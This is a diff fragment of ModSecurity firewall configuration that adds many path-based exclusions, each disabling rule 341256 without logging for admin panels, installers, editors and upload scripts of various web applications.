+SecRule REQUEST_FILENAME "/removed\.php" "phase:2,id:92909,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ezgctrlpanel\.php" "phase:2,id:92910,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/magazine/index\.php" "phase:2,id:92911,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/fckeditor/editor/filemanager/browser/default/browser\.html" "phase:2,id:92912,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/track\.php" "phase:2,id:92913,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/flashgallery\.php" "phase:2,id:92914,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/req\.php" "phase:2,id:92915,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/patch\.php" "phase:2,id:92916,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/etc/reality-info\.css" "phase:2,id:92917,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/alt_doc\.php" "phase:2,id:92918,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/product_modify\.php" "phase:2,id:92919,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/fix\.swf" "phase:2,id:92920,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/typo3/alt_mod_frameset\.php" "phase:2,id:92921,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cnf_config\.php" "phase:2,id:92922,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/classes/crop_image\.php" "phase:2,id:92923,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/members/create_listing\.php" "phase:2,id:92924,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livesupport/install/dbperform\.php" "phase:2,id:92925,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/st/out\.php" "phase:2,id:92926,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/db_sql\.php" "phase:2,id:92927,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/catch\.php" "phase:2,id:92928,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/languages\.php" "phase:2,id:92929,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/slideshow/admin/p\.php" "phase:2,id:92930,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/theme-editor\.php" "phase:2,id:92931,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/components/com_oziogallery/preview\.swf" "phase:2,id:92932,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/fla_music\.swf" "phase:2,id:92933,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mickadmincp/user\.php" "phase:2,id:92934,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/tools\.php" "phase:2,id:92935,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/includes/c0ntaktu3\.php" "phase:2,id:92936,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/formmail\.php" "phase:2,id:92937,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/free\.cgi" "phase:2,id:92938,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/plugins/wp-postratings/postratings-admin-ajax\.php" "phase:2,id:92939,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/search\.php" "phase:2,id:92940,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/online/index\.php" "phase:2,id:92941,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/contenido/main\.php" "phase:2,id:92942,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/imageresize\.php" "phase:2,id:92943,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/taguchitest\.php" "phase:2,id:92944,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/forums/modcp/moderate\.php" "phase:2,id:92945,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/odp/index\.php" "phase:2,id:92946,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/yanner\.php" "phase:2,id:92947,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/pluskernel/settings\.php" "phase:2,id:92948,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sql_error\.php" "phase:2,id:92949,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/login-register\.php" "phase:2,id:92950,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/lecture\.php" "phase:2,id:92951,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/response\.php" "phase:2,id:92952,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/edit_css\.ph" "phase:2,id:92953,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/mod_oneononechat/phpfunctions\.php" "phase:2,id:92954,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sql/fileman2\.php" "phase:2,id:92955,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/simple-popup-images/popup\.php" "phase:2,id:92956,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/design/swapimages_onmousemove\.js" "phase:2,id:92957,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/edit_image" "phase:2,id:92958,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/server\.php" "phase:2,id:92959,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/php/compress\.php" "phase:2,id:92960,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tbl_replace\.php" "phase:2,id:92961,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "wp-content/themes/bobv2/dax\.swf" "phase:2,id:92962,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/plugin-install\.php" "phase:2,id:92963,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sitemap/index\.php" "phase:2,id:92964,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tbl_row_action\.php" "phase:2,id:92965,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/www/delivery/lg\.php" "phase:2,id:92966,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tiny_mce/themes/advanced/source_editor\.htm" "phase:2,id:92967,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admincp/automediaembed_admin\.php" "phase:2,id:92968,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-comments-post\.php" "phase:2,id:92969,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/compose\.php" "phase:2,id:92970,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/database/admin\.pl" "phase:2,id:92971,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cynghrair/change\.php" "phase:2,id:92972,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/adm_noticies\.php" "phase:2,id:92973,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/plugins/ctrt/index\.php" "phase:2,id:92974,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install\.php" "phase:2,id:92975,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install1\.php" "phase:2,id:92976,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/themes\.php" "phase:2,id:92977,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admincp/" "phase:2,id:92978,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admincp/css\.php" "phase:2,id:92979,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/upl/wc/csxml\.php" "phase:2,id:92980,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/onmouseover\.js" "phase:2,id:92981,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admincp/vbacmps_install\.php" "phase:2,id:92982,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/manage/bios/edit/" "phase:2,id:92983,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/manage/index\.php" "phase:2,id:92984,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/cp-admin\.cgi" "phase:2,id:92985,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/_admin/" "phase:2,id:92986,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/siteadmin/" "phase:2,id:92987,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cmsadmin/" "phase:2,id:92988,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/forumadmin/" "phase:2,id:92989,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/management/" "phase:2,id:92990,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/manager/" "phase:2,id:92991,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/edit_product" "phase:2,id:92992,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/rssadmin/" "phase:2,id:92993,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/order/input\.php" "phase:2,id:92994,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ftp/index\.php" "phase:2,id:92995,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/editfield\.php" "phase:2,id:92996,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin1/" "phase:2,id:92997,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/edit/index\.php" "phase:2,id:92998,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ticketreply\.php" "phase:2,id:92999,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tiny_mce/plugins/advlink/link\.htm" "phase:2,id:93000,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/webadmin/" "phase:2,id:93001,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/front_content\.php" "phase:2,id:93002,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/main/" "phase:2,id:93003,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install/" "phase:2,id:93004,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/formmail\.conf" "phase:2,id:93005,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wizard/pages" "phase:2,id:93006,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/email\.php" "phase:2,id:93007,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/dict\.php" "phase:2,id:93008,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/webadmin\.php" "phase:2,id:93009,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ntunnel_mysql\.ph" "phase:2,id:93010,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/planner\.php" "phase:2,id:93011,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/facebook/" "phase:2,id:93012,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install2\.php" "phase:2,id:93013,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install\.php" "phase:2,id:93014,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/stream/index\.php" "phase:2,id:93015,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/secure\.php" "phase:2,id:93016,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/uplay/" "phase:2,id:93017,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mapas_admin_edit\.php" "phase:2,id:93018,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/projectpier/" "phase:2,id:93019,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/supportkb\.php" "phase:2,id:93020,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/systemadmin/supportkb\.php" "phase:2,id:93021,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/manage\.php" "phase:2,id:93022,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin_panel/" "phase:2,id:93023,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/inc/php/img\.php" "phase:2,id:93024,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/media/" "phase:2,id:93025,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wizard_forms\.php" "phase:2,id:93026,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/content/types/import" "phase:2,id:93027,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/post\.php" "phase:2,id:93028,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/" "phase:2,id:93029,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tstemplate/ts/index\.php" "phase:2,id:93030,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/alta\.php" "phase:2,id:93031,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/setup/" "phase:2,id:93032,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install/" "phase:2,id:93033,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/settings\.php" "phase:2,id:93034,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/projects/csb/ticket/" "phase:2,id:93035,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/contenido/main\.php" "phase:2,id:93036,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/orderform/processor\.php" "phase:2,id:93037,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/soupermail\.pl" "phase:2,id:93038,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/read_dump\.php" "phase:2,id:93039,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin_center/" "phase:2,id:93040,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admincenter/" "phase:2,id:93041,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/homedeveloper\.php" "phase:2,id:93042,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/bevestiging\.php" "phase:2,id:93043,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/imagemanager/stream/index\.php" "phase:2,id:93044,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/export\.php" "phase:2,id:93045,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/privado/" "phase:2,id:93046,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/webform/configure" "phase:2,id:93047,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/portalcp/vbpoptions\.php" "phase:2,id:93048,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/thubservice\.php" "phase:2,id:93049,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/user\.php" "phase:2,id:93050,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/survey/index\.php" "phase:2,id:93051,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/forum/post\.php" "phase:2,id:93052,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/crop_auto\.php" "phase:2,id:93053,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/main\.php" "phase:2,id:93054,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/thumb\.php" "phase:2,id:93055,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/com_virtuemart/fetchscript\.php" "phase:2,id:93056,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/uploader\.php" "phase:2,id:93057,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/survey/preview\.php" "phase:2,id:93058,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/linkmachine\.php" "phase:2,id:93059,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/productadd\.php" "phase:2,id:93060,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admint/" "phase:2,id:93061,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/setupctcform\.php" "phase:2,id:93062,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/db\.php" "phase:2,id:93063,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin-translate/" "phase:2,id:93064,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mailtemplate_outpay1_result\.php" "phase:2,id:93065,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/" "phase:2,id:93066,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/supportannouncements\.php" "phase:2,id:93067,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/socialware/popups/add_friend\.php" "phase:2,id:93068,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/open\.php" "phase:2,id:93069,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/order/totals\.php" "phase:2,id:93070,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/write\.php" "phase:2,id:93071,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/addvideo\.php" "phase:2,id:93072,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/installation/install3\.php" "phase:2,id:93073,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/installation/install\.php" "phase:2,id:93074,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install/" "phase:2,id:93075,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/categorie\.php" "phase:2,id:93076,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install\.php" "phase:2,id:93077,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/quick_reply\.php" "phase:2,id:93078,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/adm-misc\.php" "phase:2,id:93079,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install/" "phase:2,id:93080,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/glossary\.pl" "phase:2,id:93081,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin-create-edit-page\.php" "phase:2,id:93082,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/question/question\.php" "phase:2,id:93083,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/" "phase:2,id:93084,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/administrator/" "phase:2,id:93085,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/adm/" "phase:2,id:93086,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/typo3/" "phase:2,id:93087,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/typo3/ajax\.php" "phase:2,id:93088,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/setup/" "phase:2,id:93089,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/portal/index\.php" "phase:2,id:93090,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
